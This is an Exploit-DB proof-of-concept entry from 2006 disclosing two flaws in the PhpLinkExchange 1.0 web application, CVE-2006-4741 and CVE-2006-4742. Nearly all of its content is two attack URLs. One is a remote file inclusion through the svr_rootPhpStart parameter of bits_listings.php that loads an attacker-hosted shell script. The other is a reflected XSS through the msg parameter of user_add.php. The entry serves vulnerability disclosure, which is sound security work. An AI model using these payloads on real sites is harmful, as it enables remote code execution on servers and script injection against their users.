PhpLinkExchange 1.0 include/XSS Remote Vulnerabilities

2006-09-11T00:00:00
ID EDB-ID:2347
Type exploitdb
Reporter s3rv3r_hack3r
Modified 2006-09-11T00:00:00

Description

PhpLinkExchange 1.0 (include/xss) Remote Vulnerabilities. CVE-2006-4741,CVE-2006-4742. Webapps exploit for php platform

                                        
                                            vendor :www.idevspot.com

Demo : www.idevspot.com/demo/PhpStart/PhpLinkExchange

By : s3rv3r_hack3r

www: hackerz.ir & h4ckerz.com

remote file include :

http://www.domain.com/PhpLinkExchange/bits_listings.php?svr_rootPhpStart=[shell.txt?]

xss:

http://www.domain.com/PhpLinkExchange/user_add.php?msg=[xss]

# milw0rm.com [2006-09-11]